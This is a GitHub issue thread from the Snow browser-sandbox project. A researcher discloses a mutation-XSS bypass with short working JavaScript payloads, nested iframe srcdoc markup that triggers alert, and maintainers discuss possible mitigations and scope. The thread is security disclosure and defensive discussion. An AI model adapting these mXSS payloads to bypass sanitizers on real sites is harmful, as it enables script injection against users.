### ISSUE TITLE
Bypass using mXSS

### ISSUE THREAD

**Issue by mmndaniel** [LavaMoat/snow#91]
```
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML =  `<iframe
	srcdoc="<form><math><mtext></form><form><mglyph><style></math><iframe src=&quot;javascript:alert(1)&quot;></iframe>"
</iframe>`;
```
Shamelessly stolen from [here](https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/), I knew something like that would work when I saw [this](https://github.com/LavaMoat/snow/blob/main/src/html.js#L81) code path (parse, serialize, parse) :)

**Comment by weizman** [comment]
How do you even handle that...? @mmndaniel

**Comment by mmndaniel** [comment]
Well, there are three directions I can think of:
a. Avoid re-serialization altogether. It means you will have to parse the HTML, modify the resulted DOM, then append it to the DOM **without** serializing it again (you can `append` DocumentFragement), but it then means you have to preserve the semantics of each insertion method. E.g., inserting at the right point for each position of `insertAdjacentHTML`. Furthermore, consider `document.write`: scripts with src written by it could be sync, where dynamically created scripts are async by default, so it might break thier assumptions, etc etc.

b. Sanitize the input HTML from mutations (see [this](https://github.com/cure53/DOMPurify/pull/495)). Non trivial at all, and using the native [`Sanitizer`](https://developer.mozilla.org/en-US/docs/Web/API/HTML_Sanitizer_API) is too powerful for Snow's use case, because it will entirely remove any iframe/script/attributes etc.

c. Do a full roundtrip twice (i.e., parse the input HTML, serialize it, then parse it again before mutating and finally serializing it again). The idea to somehow normalize the HTML input you're going to parse, so you won't be blind to the mutation nodes. I don't know if this approach is vulnerable to >1 nesting levels of mutations: further research is needed...

**Comment by mmndaniel** [comment]
@weizman 
Consider:
```
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML =  `<iframe
	srcdoc="<form><math><mtext></form><form><mglyph><style></math><iframe></iframe>"
</iframe>`;
frames[0][0].alert(1);
```
Should it really be closed?

**Comment by weizman** [comment]
Well, if a browser JS program depends on that, it's vulnerable to same origin realms attacks, with or without Snow.
Therefore it can use Snow with `unsafe-inline`, thus allowing your snippet to work while getting the best security Snow can offer under the circumstances.
But the point with V2 is that we no longer take responsibility for attacks that can only be stopped by `unsafe-inline`.

**Comment by weizman** [comment]
Well @mmndaniel, if a browser JS program depends on that, it's vulnerable to same origin realms attacks, with or without Snow.
Therefore it can use Snow with `unsafe-inline`, thus allowing your snippet to work while getting the best security Snow can offer under the circumstances.
But the point with V2 is that we no longer take responsibility for attacks that can only be stopped by `unsafe-inline`.

**Comment by mmndaniel** [comment]
Not sure I get your point. The assumption is that the attacker can execute code in the attacked origin, right? Theoretically it could be an XSS inside a script that conforms to `script-src 'self'`, a supply chain attack (`script src thirdparty.com`), or just a "enter JS here" like in the demo app. What does it depends on `unsafe-inline`?
